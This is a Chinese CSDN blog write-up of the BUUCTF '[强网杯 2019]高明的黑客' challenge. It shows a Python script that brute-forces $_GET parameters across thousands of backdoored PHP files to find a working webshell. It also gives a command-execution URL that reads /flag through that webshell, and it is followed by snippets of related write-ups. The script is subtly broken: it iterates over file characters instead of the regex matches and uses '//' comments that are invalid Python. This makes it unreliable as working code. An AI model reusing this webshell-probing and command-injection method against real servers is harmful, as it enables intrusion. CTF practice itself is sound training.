web buu [强网杯 2019]高明的黑客1

最新推荐文章于 2024-02-29 11:12:24 发布
最新推荐文章于 2024-02-29 11:12:24 发布
阅读量341 收藏
点赞数
文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44214568/article/details/123792131
版权

考点:脚本编写

根据提示,查看源码 url+www.tar.gz,下载压缩包,发现是3002个php文件

随便打开一个发现里面有传参$_GET()函数,里面有的直接接了eval,相当于直接执行了参数里面的值,但是经过审计代码发现,里面的很多参数都已经在代码里被赋值,所以我们需要从三千多个文件里找到有用的$_GET(),很显然通过人工寻找有一定难度,那么就需要我们编写脚本、

import re
import os
import requests
file=os.listdir('D:\PHPS\phpStudy_64\phpstudy_pro\WWW\src')
zz=re.compile(r'(?<=_GET\[\').*(?=\'\])')     //正则匹配
for i in file:
      url="http://localhost/src/"+i
      f=open("D:\\PHPS\\phpStudy_64\\phpstudy_pro\\WWW\\src\\"+i)   //注意路径,用\\
      data=f.read()
      f.close()
      res=zz.findall(data)
      for j in data:
           payload=url+"?"+j+"=echo 123456"
           ret=requests.get(payload)
           print(payload)
           if "123456" in ret.text:
              print(payload)
              exit(1)

这个需要跑蛮久的

再传参即可得到flag

http://4d557817-895f-45fd-96ae-db6a6de6389c.node4.buuoj.cn:81/xk0SzyKwfzw.php?Efa5BVG=cat%20/flag

 

 

半杯雨水敬过客
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
buuctf web [强网杯 2019]高明黑客
m0_46412682的博客
07-20 649
buuctf web [强网杯 2019]高明黑客 开始的页面 既然页面上有提示,我们就输入www.tar.gz 有文件压缩包,我们下载下来,压缩打开后,有几千个文件 这里我们随便打开一个文件,这里有很多shell,但是很多是用不了的,所以要用python来测试,不可能手动 import requests import os import re import threading import time session = requests.Session() session.keep_
强网杯2019(高明黑客&强网先锋上单)
kid的博客
05-30 5568
强网杯2019(高明黑客&强网先锋上单)   前言 这里主要是对强网web高明黑客和上单两道题进行一个复现回顾 再次感谢大佬提供的场景复现:https://www.zhaoj.in/read-5873.html   高明黑客 题目是先下载给出代码 比赛时拿到这道题一下就被打懵了 3000多个文件,打开还是奇奇怪怪得文件内容 当时是真不知道,怎么做 OK现在...
[强网杯 2019]高明黑客 1
shinygod的博客
03-06 813
知识点:脚本编写能力 下载文件,并解压文件。 windows可以直接winrar解压,Linux:tar -xzvf file.tar.gz //解压tar.gz 有几千个文件随便访问 有一堆没用的参数,所以这题一个要从几千个文件找那个可以实现一句话木马的地方。 怎么用脚本实现呢?一头雾水,这边用别的师傅的脚本 import os import requests import re import threading import time print('start: '+ time.ascti
BUUctf 刷题之[强网杯 2019]高明黑客 1
dwrnxjlove的博客
08-09 872
[强网杯 2019]高明黑客 1 打开题目之后是一段简单的话: 提示到网站的源码在www.tar.gz里,于是访问,下载网页源码,下载之后发现并不是网页源码,解压下载的文件发现里面有3000多个php文件,于是用D盾粗扫了一遍,发现全是报后门文件,但是尝试利用,发现前面一个文件都不能用,但是这3000多个文件必然有可以用的,于是就尝试进行文件遍历,找出可以利用的文件: 附上自己的脚本: import re import os import requests files = os.listdir(r'C
CTF [强网杯 2019]高明黑客 writeup
baynk的博客
04-07 2044
一来搞下,有点意思,然后直接在url后面加上www.tar.gz进行下载文件下载,这文件有点大,下载的有点慢,我以为是出错了,又去扫目录。。wtf。。不管扫啥都是200。。。 不过好在,等扫描完了,文件下好了。 40M,真的狠,一打开,我惊了。 3000个文件。。命令看起来还没啥规则 。 硬着头皮解压后,随意点开一个文件。 1800多行。。。丢在本地环境里面去运行下,还尼玛报错了。 不...
[强网杯 2019]高明黑客
pakho_C的博客
04-16 1116
web第42题 [强网杯 2019]高明黑客 打开靶场 根据提示下载备份文件 里面有几千个php文件 审计一下发现,很多类似于这种,有命令执行的可能,但是很多将参数置空了,无法利用,只能自己寻找可以利用的php文件,手动寻找不现实 ,只能编写脚本 学习大佬的脚本: 出处:[强网杯 2019]高明黑客(考察代码编写能力) import os import requests import re import threading import time print('开始时间: '+ time.asc
[强网杯 2019]高明黑客(考察代码编写能力)
a3320315的博客
11-07 9579
0x01 试题分析 1、我们先打开题目,提示可以下载源码 下载源码,打开是几千个php文件,而且很乱,根本没法看,不过里面包含很多shell 不过很多shell都没用,所以我们猜测这几千个php文件中肯定含有可以使用的shell,我们只有写脚本去试了。 0x02 脚本分析 – coding: utf-8 – import os import requests import re import...
2020网鼎杯青龙组Boom
05-12
【标题】"2020网鼎杯青龙组Boom" 涉及的是一个网络安全竞赛的场景,其中"网鼎杯"是中国国内知名的网络安全技术大赛,旨在提升参赛者的网络安全技能和应急处理能力。"青龙组"可能是比赛中的一个分组或者阶段,可能...
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
最新发布
05-26
在本题目中,我们面临的是一个关于WebAssembly(简称WASM)逆向分析的挑战,源自FlareOn5赛事的Web2.0关卡。WebAssembly是一种低级虚拟机指令集,它允许开发者以接近原生的速度运行用C、C++或Rust等语言编译的代码。...
1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS闯关1.md
08-10
一些关于xss的payload
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
POSN:POSN-BUU的源代码
04-01
1. **面向对象编程**:C++支持面向对象编程(OOP),这可能意味着代码中包含多个类,每个类代表了系统中的一个实体或功能,如定位器、传感器、数据处理器等。类之间可能存在继承、封装和多态性等特性。 2. **模板和...
BUUCTF Web [强网杯 2019]高明黑客1 & [BJDCTF2020]Cookie is so stable1
网安小趴菜
09-28 190
BUUCTF Web [强网杯 2019]高明黑客1 & [BJDCTF2020]Cookie is so stable1
脚本匹配get,post [强网杯 2019]高明黑客1
m0_75178803的博客
02-29 397
打开题目访问www.tgr.gz,下载源码解压以后发现里面有很多文件,只有一个是index.html,其余都是php文件。并且尝试访问也有看大佬的wp是说,应该找存在形如以下的结构,传入payload找flag。步骤大致是字符匹配$_GET[$_POST[,尝试往匹配到的参数名传递echo,看看哪些参数可以接收到参数并打印出来。这里依旧是用大佬的脚本跑一下最终找到了利用文件: xk0SzyKwfzw.php找到了利用的参数:Efa5BVG命令执行, payload:得到flag。
buuctf-web-[强网杯 2019]高明黑客1
mlws1900的博客
08-20 406
解题思路就是用get和post对所有文件进行挨个传参,一句话返回一个预定的值就利用该文件来获取flag。借其他大佬的脚本一用(跟扫目录返回状态码一个思路)直接复制www.tar.gz下载源码。打开发现很多个php文件。随机打开一个,观察源代码。利用以下payload。
[强网杯 2019]高明黑客(每日一题)
qq_51684648的博客
09-07 985
[强网杯 2019]高明黑客(每日一题) 1,打开网页,发现提示,下载文件 2,发现了三千多个php文件,打开几个文件,发现有可以传参的地方,尝试传参,但命令并没有被执行。 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-RfKq4Y6p-1631019565642)(https://i.loli.net/2021/09/07/yVeIzNdU5c8Ebar.png)] 3,猜测这三千多文件里有能被利用的shell,于是编写脚本尝试(我好菜,只能抄大佬们的脚本,在学了在学
BUUCTF WEB 高明黑客1
qq_41696858的博客
12-13 475
这题也没啥好说的,就是硬跑脚本 打开场景,就是让你下www.tar.gz 解压好了,两千多个PHP,execuse me??????? 打开看看,每个PHP文件里面都有eval,exec之类的,但也不是全部有用,事实上,跑完就只有一个参数有用 就是通过脚本,不断地去试,也没啥好说的,两种做法: 1.把文件全都下到本地,自己开个环境,把最大连接数调大些,自己跑,找到参数,再去利用 2.直接用靶场跑,我测试了一下,BUUCTF能承受的最大的连接数在20左右,我把网上大佬在本地跑的脚本改了一下,加了几个sleep
BUUCTF [强网杯 2019] 高明黑客
Senimo
12-07 327
BUUCTF [强网杯 2019] 高明黑客 启动环境: 提示备份了网站源码到www.tar.gz,在连接后添加后缀,下载源码: 随机打开几个文件: 可以查看到存在GET、POST传参,并且之后使用了system()函数,可能存在命令执行漏洞。 所以需要从大批量php文件中找到有回显的传参,编写Python 3脚本: ...
buuctf 高明黑客
07-28
- *1* [BUUctf 刷题之[强网杯 2019]高明黑客 1](https://blog.csdn.net/dwrnxjlove/article/details/119535138)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值